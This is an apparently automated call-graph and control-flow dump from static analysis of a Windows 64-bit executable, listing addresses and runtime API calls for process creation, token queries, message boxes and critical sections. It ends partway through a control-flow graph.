7ff7c71d7e9c 37 API calls 17884->17885 17888 7ff7c71d41c2 17885->17888 17886 7ff7c71d41ef 17890 7ff7c71ca514 __std_exception_copy 37 API calls 17886->17890 17887 7ff7c71d42b2 17889 7ff7c71d7e9c 37 API calls 17887->17889 17888->17887 17894 7ff7c71d428c 17888->17894 17895 7ff7c71d41dd 17888->17895 17891 7ff7c71d42dc 17889->17891 17893 7ff7c71d426d 17890->17893 17892 7ff7c71d7e9c 37 API calls 17891->17892 17896 7ff7c71d42ed 17892->17896 17897 7ff7c71d5394 17893->17897 17902 7ff7c71d4275 17893->17902 17898 7ff7c71ca514 __std_exception_copy 37 API calls 17894->17898 17895->17886 17895->17887 17899 7ff7c71d8090 20 API calls 17896->17899 17900 7ff7c71ca970 _isindst 17 API calls 17897->17900 17898->17893 17912 7ff7c71d4356 __scrt_get_show_window_mode 17899->17912 17901 7ff7c71d53a9 17900->17901 17903 7ff7c71bc5c0 _log10_special 8 API calls 17902->17903 17904 7ff7c71ce3c1 17903->17904 17928 7ff7c71d3b64 17904->17928 17905 7ff7c71d47f3 memcpy_s __scrt_get_show_window_mode 17910 7ff7c71d49eb 17905->17910 17922 7ff7c71c4f78 11 API calls _get_daylight 17905->17922 17924 7ff7c71ca950 37 API calls _invalid_parameter_noinfo 17905->17924 17906 7ff7c71d46ff __scrt_get_show_window_mode 17907 7ff7c71d4cdb memcpy_s __scrt_get_show_window_mode 17908 7ff7c71d4a3f 17907->17908 17907->17910 17921 7ff7c71c4f78 11 API calls _get_daylight 17907->17921 17926 7ff7c71ca950 37 API calls _invalid_parameter_noinfo 17907->17926 17909 7ff7c71d3c80 37 API calls 17908->17909 17914 7ff7c71d5157 17909->17914 17910->17908 17910->17910 17913 7ff7c71d53ac memcpy_s 37 API calls 17910->17913 17911 7ff7c71d4397 memcpy_s 17911->17905 17911->17907 17912->17906 17912->17911 17915 7ff7c71c4f78 _get_daylight 11 API calls 17912->17915 17913->17908 17914->17914 17919 7ff7c71d53ac memcpy_s 37 API calls 17914->17919 17927 7ff7c71d51b2 17914->17927 17916 7ff7c71d47d0 17915->17916 17917 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 17916->17917 17917->17911 17918 7ff7c71d5338 17920 7ff7c71d7e9c 37 API calls 17918->17920 17919->17927 17920->17902 17921->17907 17922->17905 17923 7ff7c71d3c80 37 API calls 17923->17927 17924->17905 17925 7ff7c71d53ac memcpy_s 37 API calls 17925->17927 17926->17907 17927->17918 17927->17923 17927->17925 17929 7ff7c71d3b83 17928->17929 17930 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17929->17930 17931 7ff7c71d3bae memcpy_s 17929->17931 17930->17931 17931->17854 17933 7ff7c71ce248 memcpy_s 17932->17933 17934 7ff7c71c4830 45 API calls 17933->17934 17935 7ff7c71ce302 memcpy_s __scrt_get_show_window_mode 17933->17935 17934->17935 17935->17859 17935->17935 17937 7ff7c71cdf9b 17936->17937 17940 7ff7c71cdfe8 memcpy_s 17936->17940 17938 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17937->17938 17939 7ff7c71cdfc7 17938->17939 17939->17859 17941 7ff7c71ce053 17940->17941 17943 7ff7c71c4830 45 API calls 17940->17943 17942 7ff7c71ca514 __std_exception_copy 37 API calls 17941->17942 17946 7ff7c71ce095 memcpy_s 17942->17946 17943->17941 17944 7ff7c71ca970 _isindst 17 API calls 17945 7ff7c71ce140 17944->17945 17946->17944 17948 7ff7c71c0ccf 17947->17948 17949 7ff7c71c0cbe 17947->17949 17948->17949 17950 7ff7c71cd66c _fread_nolock 12 API calls 17948->17950 17949->17783 17951 7ff7c71c0d00 17950->17951 17952 7ff7c71c0d14 17951->17952 17954 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17951->17954 17953 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17952->17953 17953->17949 17954->17952 17956 7ff7c71c47d6 17955->17956 17958 7ff7c71c47de 17955->17958 17957 7ff7c71c4830 45 API calls 17956->17957 17957->17958 17958->17794 17960 7ff7c71cda41 17959->17960 17961 7ff7c71c486f 17959->17961 17960->17961 17962 7ff7c71d3374 45 API calls 17960->17962 17963 7ff7c71cda94 17961->17963 17962->17961 17964 7ff7c71c487f 17963->17964 17965 7ff7c71cdaad 17963->17965 17964->17715 17965->17964 17966 7ff7c71d26c0 45 API calls 17965->17966 17966->17964 17970 7ff7c71d6df8 17967->17970 17973 7ff7c71d6e5c 17970->17973 17971 7ff7c71bc5c0 _log10_special 8 API calls 17972 7ff7c71d012d 17971->17972 17972->17818 17973->17971 17975 7ff7c71c107f 17974->17975 17976 7ff7c71c106d 17974->17976 17979 7ff7c71c108d 17975->17979 17983 7ff7c71c10c9 17975->17983 17977 7ff7c71c4f78 _get_daylight 11 API calls 17976->17977 17978 7ff7c71c1072 17977->17978 17981 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 17978->17981 17980 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 17979->17980 17988 7ff7c71c107d 17980->17988 17981->17988 17982 7ff7c71c1445 17984 7ff7c71c4f78 _get_daylight 11 API calls 17982->17984 17982->17988 17983->17982 17985 7ff7c71c4f78 _get_daylight 11 API calls 17983->17985 17986 7ff7c71c16d9 17984->17986 17987 7ff7c71c143a 17985->17987 17989 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 17986->17989 17990 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 17987->17990 17988->17680 17989->17988 17990->17982 17992 7ff7c71c0774 17991->17992 18019 7ff7c71c04d4 17992->18019 17994 7ff7c71c078d 17994->17334 18031 7ff7c71c042c 17995->18031 17999 7ff7c71bc8c0 17998->17999 18000 7ff7c71b2930 GetCurrentProcessId 17999->18000 18001 7ff7c71b1c80 49 API calls 18000->18001 18002 7ff7c71b2979 18001->18002 18045 7ff7c71c49f4 18002->18045 18007 7ff7c71b1c80 49 API calls 18008 7ff7c71b29ff 18007->18008 18075 7ff7c71b2620 18008->18075 18011 7ff7c71bc5c0 _log10_special 8 API calls 18012 7ff7c71b2a31 18011->18012 18012->17373 18014 7ff7c71c0189 18013->18014 18015 7ff7c71b1b89 18013->18015 18016 7ff7c71c4f78 _get_daylight 11 API calls 18014->18016 18015->17372 18015->17373 18017 7ff7c71c018e 18016->18017 18018 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 18017->18018 18018->18015 18020 7ff7c71c053e 18019->18020 18021 7ff7c71c04fe 18019->18021 18020->18021 18023 7ff7c71c054a 18020->18023 18022 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 18021->18022 18029 7ff7c71c0525 18022->18029 18030 7ff7c71c54dc EnterCriticalSection 18023->18030 18029->17994 18032 7ff7c71c0456 18031->18032 18033 7ff7c71b1a20 18031->18033 18032->18033 18034 7ff7c71c04a2 18032->18034 18035 7ff7c71c0465 __scrt_get_show_window_mode 18032->18035 18033->17341 18033->17342 18044 7ff7c71c54dc EnterCriticalSection 18034->18044 18037 7ff7c71c4f78 _get_daylight 11 API calls 18035->18037 18039 7ff7c71c047a 18037->18039 18041 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 18039->18041 18041->18033 18046 7ff7c71c4a4e 18045->18046 18047 7ff7c71c4a73 18046->18047 18049 7ff7c71c4aaf 18046->18049 18048 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 18047->18048 18051 7ff7c71c4a9d 18048->18051 18084 7ff7c71c2c80 18049->18084 18053 7ff7c71bc5c0 _log10_special 8 API calls 18051->18053 18052 7ff7c71c4b8c 18054 7ff7c71ca9b8 __free_lconv_mon 11 API calls 18052->18054 18056 7ff7c71b29c3 18053->18056 18054->18051 18063 7ff7c71c51d0 18056->18063 18057 7ff7c71c4b61 18060 7ff7c71ca9b8 __free_lconv_mon 11 API calls 18057->18060 18058 7ff7c71c4bb0 18058->18052 18059 7ff7c71c4bba 18058->18059 18062 7ff7c71ca9b8 __free_lconv_mon 11 API calls 18059->18062 18060->18051 18061 7ff7c71c4b58 18061->18052 18061->18057 18062->18051 18064 7ff7c71cb338 _get_daylight 11 API calls 18063->18064 18065 7ff7c71c51e7 18064->18065 18066 7ff7c71b29e5 18065->18066 18067 7ff7c71cec08 _get_daylight 11 API calls 18065->18067 18069 7ff7c71c5227 18065->18069 18066->18007 18068 7ff7c71c521c 18067->18068 18070 7ff7c71ca9b8 __free_lconv_mon 11 API calls 18068->18070 18069->18066 18219 7ff7c71cec90 18069->18219 18070->18069 18073 7ff7c71ca970 _isindst 17 API calls 18074 7ff7c71c526c 18073->18074 18076 7ff7c71b262f 18075->18076 18077 7ff7c71b9400 2 API calls 18076->18077 18078 7ff7c71b2660 18077->18078 18079 7ff7c71b266f MessageBoxW 18078->18079 18080 7ff7c71b2683 MessageBoxA 18078->18080 18081 7ff7c71b2690 18079->18081 18080->18081 18082 7ff7c71bc5c0 _log10_special 8 API calls 18081->18082 18083 7ff7c71b26a0 18082->18083 18083->18011 18085 7ff7c71c2cbe 18084->18085 18086 7ff7c71c2cae 18084->18086 18087 7ff7c71c2cc7 18085->18087 18094 7ff7c71c2cf5 18085->18094 18090 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 18086->18090 18088 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 18087->18088 18089 7ff7c71c2ced 18088->18089 18089->18052 18089->18057 18089->18058 18089->18061 18090->18089 18091 7ff7c71c4830 45 API calls 18091->18094 18093 7ff7c71c2fa4 18096 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 18093->18096 18094->18086 18094->18089 18094->18091 18094->18093 18098 7ff7c71c3610 18094->18098 18124 7ff7c71c32d8 18094->18124 18154 7ff7c71c2b60 18094->18154 18096->18086 18099 7ff7c71c3652 18098->18099 18100 7ff7c71c36c5 18098->18100 18103 7ff7c71c36ef 18099->18103 18104 7ff7c71c3658 18099->18104 18101 7ff7c71c371f 18100->18101 18102 7ff7c71c36ca 18100->18102 18101->18103 18113 7ff7c71c372e 18101->18113 18122 7ff7c71c3688 18101->18122 18105 7ff7c71c36ff 18102->18105 18106 7ff7c71c36cc 18102->18106 18171 7ff7c71c1bc0 18103->18171 18111 7ff7c71c365d 18104->18111 18104->18113 18178 7ff7c71c17b0 18105->18178 18107 7ff7c71c366d 18106->18107 18112 7ff7c71c36db 18106->18112 18123 7ff7c71c375d 18107->18123 18157 7ff7c71c3f74 18107->18157 18111->18107 18114 7ff7c71c36a0 18111->18114 18111->18122 18112->18103 18116 7ff7c71c36e0 18112->18116 18113->18123 18185 7ff7c71c1fd0 18113->18185 18114->18123 18167 7ff7c71c4430 18114->18167 18119 7ff7c71c45c8 37 API calls 18116->18119 18116->18123 18118 7ff7c71bc5c0 _log10_special 8 API calls 18120 7ff7c71c39f3 18118->18120 18119->18122 18120->18094 18122->18123 18192 7ff7c71ce8c8 18122->18192 18123->18118 18125 7ff7c71c32e3 18124->18125 18126 7ff7c71c32f9 18124->18126 18127 7ff7c71c3337 18125->18127 18128 7ff7c71c3652 18125->18128 18129 7ff7c71c36c5 18125->18129 18126->18127 18130 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 18126->18130 18127->18094 18133 7ff7c71c36ef 18128->18133 18134 7ff7c71c3658 18128->18134 18131 7ff7c71c371f 18129->18131 18132 7ff7c71c36ca 18129->18132 18130->18127 18131->18133 18141 7ff7c71c372e 18131->18141 18152 7ff7c71c3688 18131->18152 18135 7ff7c71c36ff 18132->18135 18136 7ff7c71c36cc 18132->18136 18137 7ff7c71c1bc0 38 API calls 18133->18137 18140 7ff7c71c365d 18134->18140 18134->18141 18138 7ff7c71c17b0 38 API calls 18135->18138 18143 7ff7c71c36db 18136->18143 18145 7ff7c71c366d 18136->18145 18137->18152 18138->18152 18139 7ff7c71c3f74 47 API calls 18139->18152 18144 7ff7c71c36a0 18140->18144 18140->18145 18140->18152 18142 7ff7c71c1fd0 38 API calls 18141->18142 18153 7ff7c71c375d 18141->18153 18142->18152 18143->18133 18147 7ff7c71c36e0 18143->18147 18146 7ff7c71c4430 47 API calls 18144->18146 18144->18153 18145->18139 18145->18153 18146->18152 18149 7ff7c71c45c8 37 API calls 18147->18149 18147->18153 18148 7ff7c71bc5c0 _log10_special 8 API calls 18150 7ff7c71c39f3 18148->18150 18149->18152 18150->18094 18151 7ff7c71ce8c8 47 API calls 18151->18152 18152->18151 18152->18153 18153->18148 18202 7ff7c71c0d84 18154->18202 18159 7ff7c71c3f96 18157->18159 18158 7ff7c71c0bf0 12 API calls 18160 7ff7c71c3fde 18158->18160 18159->18158 18161 7ff7c71ce5e0 46 API calls 18160->18161 18162 7ff7c71c40b1 18161->18162 18163 7ff7c71c4830 45 API calls 18162->18163 18164 7ff7c71c40d3 18162->18164 18163->18164 18165 7ff7c71c4830 45 API calls 18164->18165 18166 7ff7c71c415c 18164->18166 18165->18166 18166->18122 18168 7ff7c71c44b0 18167->18168 18169 7ff7c71c4448 18167->18169 18168->18122 18169->18168 18170 7ff7c71ce8c8 47 API calls 18169->18170 18170->18168 18172 7ff7c71c1bf3 18171->18172 18173 7ff7c71c1c22 18172->18173 18175 7ff7c71c1cdf 18172->18175 18174 7ff7c71c0bf0 12 API calls 18173->18174 18177 7ff7c71c1c5f 18173->18177 18174->18177 18176 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 18175->18176 18176->18177 18177->18122 18179 7ff7c71c17e3 18178->18179 18180 7ff7c71c1812 18179->18180 18182 7ff7c71c18cf 18179->18182 18181 7ff7c71c0bf0 12 API calls 18180->18181 18184 7ff7c71c184f 18180->18184 18181->18184 18183 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 18182->18183 18183->18184 18184->18122 18186 7ff7c71c2003 18185->18186 18187 7ff7c71c2032 18186->18187 18189 7ff7c71c20ef 18186->18189 18188 7ff7c71c0bf0 12 API calls 18187->18188 18191 7ff7c71c206f 18187->18191 18188->18191 18190 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 18189->18190 18190->18191 18191->18122 18193 7ff7c71ce8f0 18192->18193 18195 7ff7c71c4830 45 API calls 18193->18195 18196 7ff7c71ce935 18193->18196 18198 7ff7c71ce8f5 __scrt_get_show_window_mode 18193->18198 18200 7ff7c71ce91e __scrt_get_show_window_mode 18193->18200 18194 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 18194->18198 18195->18196 18197 7ff7c71d0858 WideCharToMultiByte 18196->18197 18196->18198 18196->18200 18199 7ff7c71cea11 18197->18199 18198->18122 18199->18198 18201 7ff7c71cea26 GetLastError 18199->18201 18200->18194 18200->18198 18201->18198 18201->18200 18203 7ff7c71c0db1 18202->18203 18204 7ff7c71c0dc3 18202->18204 18205 7ff7c71c4f78 _get_daylight 11 API calls 18203->18205 18206 7ff7c71c0dd0 18204->18206 18211 7ff7c71c0e0d 18204->18211 18207 7ff7c71c0db6 18205->18207 18208 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 18206->18208 18209 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 18207->18209 18216 7ff7c71c0dc1 18208->18216 18209->18216 18210 7ff7c71c0eb6 18213 7ff7c71c4f78 _get_daylight 11 API calls 18210->18213 18210->18216 18211->18210 18212 7ff7c71c4f78 _get_daylight 11 API calls 18211->18212 18214 7ff7c71c0eab 18212->18214 18215 7ff7c71c0f60 18213->18215 18217 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 18214->18217 18218 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 18215->18218 18216->18094 18217->18210 18218->18216 18223 7ff7c71cecad 18219->18223 18220 7ff7c71cecb2 18221 7ff7c71c524d 18220->18221 18222 7ff7c71c4f78 _get_daylight 11 API calls 18220->18222 18221->18066 18221->18073 18224 7ff7c71cecbc 18222->18224 18223->18220 18223->18221 18226 7ff7c71cecfc 18223->18226 18225 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 18224->18225 18225->18221 18226->18221 18227 7ff7c71c4f78 _get_daylight 11 API calls 18226->18227 18227->18224 18229 7ff7c71c82b5 18228->18229 18230 7ff7c71c82c8 18228->18230 18231 7ff7c71c4f78 _get_daylight 11 API calls 18229->18231 18238 7ff7c71c7f2c 18230->18238 18233 7ff7c71c82ba 18231->18233 18235 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 18233->18235 18236 7ff7c71c82c6 18235->18236 18236->17393 18245 7ff7c71d0348 EnterCriticalSection 18238->18245 18247 7ff7c71b87a1 GetTokenInformation 18246->18247 18248 7ff7c71b8823 __std_exception_destroy 18246->18248 18249 7ff7c71b87c2 GetLastError 18247->18249 18252 7ff7c71b87cd 18247->18252 18250 7ff7c71b8836 CloseHandle 18248->18250 18251 7ff7c71b883c 18248->18251 18249->18248 18249->18252 18250->18251 18251->17398 18252->18248 18253 7ff7c71b87e9 GetTokenInformation 18252->18253 18253->18248 18254 7ff7c71b880c 18253->18254 18254->18248 18255 7ff7c71b8816 ConvertSidToStringSidW 18254->18255 18255->18248 18257 7ff7c71bc8c0 18256->18257 18258 7ff7c71b2b74 GetCurrentProcessId 18257->18258 18259 7ff7c71b26b0 48 API calls 18258->18259 18260 7ff7c71b2bc7 18259->18260 18261 7ff7c71c4c48 48 API calls 18260->18261 18262 7ff7c71b2c10 MessageBoxW 18261->18262 18263 7ff7c71bc5c0 _log10_special 8 API calls 18262->18263 18264 7ff7c71b2c40 18263->18264 18264->17409 18266 7ff7c71b25e5 18265->18266 18267 7ff7c71c4c48 48 API calls 18266->18267 18268 7ff7c71b2604 18267->18268 18268->17417 18304 7ff7c71c8804 18269->18304 18273 7ff7c71b81cc 18272->18273 18274 7ff7c71b9400 2 API calls 18273->18274 18275 7ff7c71b81eb 18274->18275 18276 7ff7c71b8206 ExpandEnvironmentStringsW 18275->18276 18277 7ff7c71b81f3 18275->18277 18279 7ff7c71b822c __std_exception_destroy 18276->18279 18278 7ff7c71b2810 49 API calls 18277->18278 18280 7ff7c71b81ff __std_exception_destroy 18278->18280 18281 7ff7c71b8230 18279->18281 18282 7ff7c71b8243 18279->18282 18283 7ff7c71bc5c0 _log10_special 8 API calls 18280->18283 18284 7ff7c71b2810 49 API calls 18281->18284 18286 7ff7c71b82af 18282->18286 18289 7ff7c71b8251 GetDriveTypeW 18282->18289 18284->18280 18345 7ff7c71d15c8 18304->18345 18404 7ff7c71d1340 18345->18404 18425 7ff7c71d0348 EnterCriticalSection 18404->18425 18435 7ff7c71b455a 18434->18435 18436 7ff7c71b9400 2 API calls 18435->18436 18437 7ff7c71b457f 18436->18437 18438 7ff7c71bc5c0 _log10_special 8 API calls 18437->18438 18439 7ff7c71b45a7 18438->18439 18439->17461 18441 7ff7c71b7e1e 18440->18441 18442 7ff7c71b1c80 49 API calls 18441->18442 18443 7ff7c71b7f42 18441->18443 18449 7ff7c71b7ea5 18442->18449 18444 7ff7c71bc5c0 _log10_special 8 API calls 18443->18444 18445 7ff7c71b7f73 18444->18445 18445->17461 18446 7ff7c71b1c80 49 API calls 18446->18449 18447 7ff7c71b4550 10 API calls 18447->18449 18448 7ff7c71b7efb 18450 7ff7c71b9400 2 API calls 18448->18450 18449->18443 18449->18446 18449->18447 18449->18448 18451 7ff7c71b7f13 CreateDirectoryW 18450->18451 18451->18443 18451->18449 18453 7ff7c71b1613 18452->18453 18454 7ff7c71b1637 18452->18454 18573 7ff7c71b1050 18453->18573 18455 7ff7c71b45b0 108 API calls 18454->18455 18458 7ff7c71b164b 18455->18458 18457 7ff7c71b1618 18459 7ff7c71b162e 18457->18459 18462 7ff7c71b2710 54 API calls 18457->18462 18460 7ff7c71b1682 18458->18460 18461 7ff7c71b1653 18458->18461 18459->17461 18464 7ff7c71b45b0 108 API calls 18460->18464 18463 7ff7c71c4f78 _get_daylight 11 API calls 18461->18463 18462->18459 18465 7ff7c71b1658 18463->18465 18466 7ff7c71b1696 18464->18466 18467 7ff7c71b2910 54 API calls 18465->18467 18468 7ff7c71b16b8 18466->18468 18469 7ff7c71b169e 18466->18469 18472 7ff7c71b1671 18467->18472 18471 7ff7c71c0744 73 API calls 18468->18471 18470 7ff7c71b2710 54 API calls 18469->18470 18473 7ff7c71b16ae 18470->18473 18474 7ff7c71b16cd 18471->18474 18472->17461 18477 7ff7c71c00bc 74 API calls 18473->18477 18475 7ff7c71b16d1 18474->18475 18476 7ff7c71b16f9 18474->18476 18501 7ff7c71b717b 18500->18501 18503 7ff7c71b7134 18500->18503 18501->17461 18503->18501 18637 7ff7c71c5094 18503->18637 18505 7ff7c71b4191 18504->18505 18506 7ff7c71b44d0 49 API calls 18505->18506 18507 7ff7c71b41cb 18506->18507 18508 7ff7c71b44d0 49 API calls 18507->18508 18509 7ff7c71b41db 18508->18509 18510 7ff7c71b41fd 18509->18510 18511 7ff7c71b422c 18509->18511 18652 7ff7c71b4100 18510->18652 18513 7ff7c71b4100 51 API calls 18511->18513 18514 7ff7c71b422a 18513->18514 18515 7ff7c71b4257 18514->18515 18516 7ff7c71b428c 18514->18516 18659 7ff7c71b7ce0 18515->18659 18518 7ff7c71b4100 51 API calls 18516->18518 18549 7ff7c71b1c80 49 API calls 18548->18549 18550 7ff7c71b4464 18549->18550 18550->17461 18574 7ff7c71b45b0 108 API calls 18573->18574 18575 7ff7c71b108c 18574->18575 18576 7ff7c71b1094 18575->18576 18577 7ff7c71b10a9 18575->18577 18578 7ff7c71b2710 54 API calls 18576->18578 18579 7ff7c71c0744 73 API calls 18577->18579 18584 7ff7c71b10a4 __std_exception_destroy 18578->18584 18580 7ff7c71b10bf 18579->18580 18581 7ff7c71b10e6 18580->18581 18582 7ff7c71b10c3 18580->18582 18586 7ff7c71b1122 18581->18586 18587 7ff7c71b10f7 18581->18587 18583 7ff7c71c4f78 _get_daylight 11 API calls 18582->18583 18584->18457 18638 7ff7c71c50a1 18637->18638 18639 7ff7c71c50ce 18637->18639 18640 7ff7c71c5058 18638->18640 18642 7ff7c71c4f78 _get_daylight 11 API calls 18638->18642 18641 7ff7c71c50f1 18639->18641 18644 7ff7c71c510d 18639->18644 18640->18503 18643 7ff7c71c4f78 _get_daylight 11 API calls 18641->18643 18645 7ff7c71c50ab 18642->18645 18647 7ff7c71c50f6 18643->18647 18648 7ff7c71c4fbc 45 API calls 18644->18648 18646 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 18645->18646 18649 7ff7c71c50b6 18646->18649 18650 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 18647->18650 18651 7ff7c71c5101 18648->18651 18649->18503 18650->18651 18651->18503 18653 7ff7c71b4126 18652->18653 18654 7ff7c71c49f4 49 API calls 18653->18654 18716 7ff7c71c5f38 18715->18716 18717 7ff7c71c5f5e 18716->18717 18719 7ff7c71c5f91 18716->18719 18718 7ff7c71c4f78 _get_daylight 11 API calls 18717->18718 18720 7ff7c71c5f63 18718->18720 18721 7ff7c71c5fa4 18719->18721 18722 7ff7c71c5f97 18719->18722 18723 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 18720->18723 18734 7ff7c71cac98 18721->18734 18724 7ff7c71c4f78 _get_daylight 11 API calls 18722->18724 18726 7ff7c71b4606 18723->18726 18724->18726 18726->17486 18747 7ff7c71d0348 EnterCriticalSection 18734->18747 19107 7ff7c71c7968 19106->19107 19110 7ff7c71c7444 19107->19110 19109 7ff7c71c7981 19109->17496 19111 7ff7c71c745f 19110->19111 19112 7ff7c71c748e 19110->19112 19113 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 19111->19113 19120 7ff7c71c54dc EnterCriticalSection 19112->19120 19115 7ff7c71c747f 19113->19115 19115->19109 19122 7ff7c71bfeb3 19121->19122 19124 7ff7c71bfee1 19121->19124 19123 7ff7c71ca884 _invalid_parameter_noinfo 37 API calls 19122->19123 19126 7ff7c71bfed3 19123->19126 19124->19126 19131 7ff7c71c54dc EnterCriticalSection 19124->19131 19126->17500 19133 7ff7c71b45b0 108 API calls 19132->19133 19134 7ff7c71b1493 19133->19134 19135 7ff7c71b149b 19134->19135 19136 7ff7c71b14bc 19134->19136 19138 7ff7c71b2710 54 API calls 19135->19138 19137 7ff7c71c0744 73 API calls 19136->19137 19139 7ff7c71b14d1 19137->19139 19140 7ff7c71b14ab 19138->19140 19141 7ff7c71b14d5 19139->19141 19142 7ff7c71b14f8 19139->19142 19140->17526 19239 7ff7c71b6365 19238->19239 19240 7ff7c71b1c80 49 API calls 19239->19240 19241 7ff7c71b63a1 19240->19241 19242 7ff7c71b63aa 19241->19242 19243 7ff7c71b63cd 19241->19243 19244 7ff7c71b2710 54 API calls 19242->19244 19245 7ff7c71b4620 49 API calls 19243->19245 19261 7ff7c71b63c3 19244->19261 19246 7ff7c71b63e5 19245->19246 19247 7ff7c71b6403 19246->19247 19248 7ff7c71b2710 54 API calls 19246->19248 19249 7ff7c71b4550 10 API calls 19247->19249 19248->19247 19251 7ff7c71b640d 19249->19251 19250 7ff7c71bc5c0 _log10_special 8 API calls 19252 7ff7c71b336e 19250->19252 19253 7ff7c71b641b 19251->19253 19254 7ff7c71b9070 3 API calls 19251->19254 19252->17600 19269 7ff7c71b64f0 19252->19269 19254->19253 19261->19250 19418 7ff7c71b53f0 19269->19418 19637 7ff7c71c5480 19638 7ff7c71c548b 19637->19638 19646 7ff7c71cf314 19638->19646 19659 7ff7c71d0348 EnterCriticalSection 19646->19659 20516 7ff7c71cf9fc 20517 7ff7c71cfbee 20516->20517 20519 7ff7c71cfa3e _isindst 20516->20519 20518 7ff7c71c4f78 _get_daylight 11 API calls 20517->20518 20536 7ff7c71cfbde 20518->20536 20519->20517 20522 7ff7c71cfabe _isindst 20519->20522 20520 7ff7c71bc5c0 _log10_special 8 API calls 20521 7ff7c71cfc09 20520->20521 20537 7ff7c71d6204 20522->20537 20527 7ff7c71cfc1a 20528 7ff7c71ca970 _isindst 17 API calls 20527->20528 20530 7ff7c71cfc2e 20528->20530 20534 7ff7c71cfb1b 20534->20536 20562 7ff7c71d6248 20534->20562 20536->20520 20538 7ff7c71d6213 20537->20538 20539 7ff7c71cfadc 20537->20539 20569 7ff7c71d0348 EnterCriticalSection 20538->20569 20544 7ff7c71d5608 20539->20544 20545 7ff7c71d5611 20544->20545 20546 7ff7c71cfaf1 20544->20546 20547 7ff7c71c4f78 _get_daylight 11 API calls 20545->20547 20546->20527 20550 7ff7c71d5638 20546->20550 20548 7ff7c71d5616 20547->20548 20549 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 20548->20549 20549->20546 20551 7ff7c71d5641 20550->20551 20552 7ff7c71cfb02 20550->20552 20553 7ff7c71c4f78 _get_daylight 11 API calls 20551->20553 20552->20527 20556 7ff7c71d5668 20552->20556 20554 7ff7c71d5646 20553->20554 20555 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 20554->20555 20555->20552 20557 7ff7c71d5671 20556->20557 20559 7ff7c71cfb13 20556->20559 20558 7ff7c71c4f78 _get_daylight 11 API calls 20557->20558 20560 7ff7c71d5676 20558->20560 20559->20527 20559->20534 20561 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 20560->20561 20561->20559 20570 7ff7c71d0348 EnterCriticalSection 20562->20570 20350 7ff7c71cc590 20361 7ff7c71d0348 EnterCriticalSection 20350->20361 20658 7ff7c71dadd9 20661 7ff7c71c54e8 LeaveCriticalSection 20658->20661 19685 7ff7c71dae6e 19686 7ff7c71dae7d 19685->19686 19688 7ff7c71dae87 19685->19688 19689 7ff7c71d03a8 LeaveCriticalSection 19686->19689

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 0 7ff7c71b8bd0-7ff7c71b8d16 call 7ff7c71bc8c0 call 7ff7c71b9400 SetConsoleCtrlHandler GetStartupInfoW call 7ff7c71c5460 call 7ff7c71ca4ec call 7ff7c71c878c call 7ff7c71c5460 call 7ff7c71ca4ec call 7ff7c71c878c call 7ff7c71c5460 call 7ff7c71ca4ec call 7ff7c71c878c GetCommandLineW CreateProcessW 23 7ff7c71b8d18-7ff7c71b8d38 GetLastError call 7ff7c71b2c50 0->23 24 7ff7c71b8d3d-7ff7c71b8d79 RegisterClassW 0->24 31 7ff7c71b9029-7ff7c71b904f call 7ff7c71bc5c0 23->31 26 7ff7c71b8d81-7ff7c71b8dd5 CreateWindowExW 24->26 27 7ff7c71b8d7b GetLastError 24->27 29 7ff7c71b8ddf-7ff7c71b8de4 ShowWindow 26->29 30 7ff7c71b8dd7-7ff7c71b8ddd GetLastError 26->30 27->26 32 7ff7c71b8dea-7ff7c71b8dfa WaitForSingleObject 29->32 30->32 34 7ff7c71b8e78-7ff7c71b8e7f 32->34 35 7ff7c71b8dfc 32->35 36 7ff7c71b8ec2-7ff7c71b8ec9 34->36 37 7ff7c71b8e81-7ff7c71b8e91 WaitForSingleObject 34->37 39 7ff7c71b8e00-7ff7c71b8e03 35->39 42 7ff7c71b8fb0-7ff7c71b8fc9 GetMessageW 36->42 43 7ff7c71b8ecf-7ff7c71b8ee5 QueryPerformanceFrequency QueryPerformanceCounter 36->43 40 7ff7c71b8fe8-7ff7c71b8ff2 37->40 41 7ff7c71b8e97-7ff7c71b8ea7 TerminateProcess 37->41 44 7ff7c71b8e05 GetLastError 39->44 45 7ff7c71b8e0b-7ff7c71b8e12 39->45 49 7ff7c71b9001-7ff7c71b9025 GetExitCodeProcess CloseHandle * 2 40->49 50 7ff7c71b8ff4-7ff7c71b8ffa DestroyWindow 40->50 51 7ff7c71b8eaf-7ff7c71b8ebd WaitForSingleObject 41->51 52 7ff7c71b8ea9 GetLastError 41->52 47 7ff7c71b8fdf-7ff7c71b8fe6 42->47 48 7ff7c71b8fcb-7ff7c71b8fd9 TranslateMessage DispatchMessageW 42->48 53 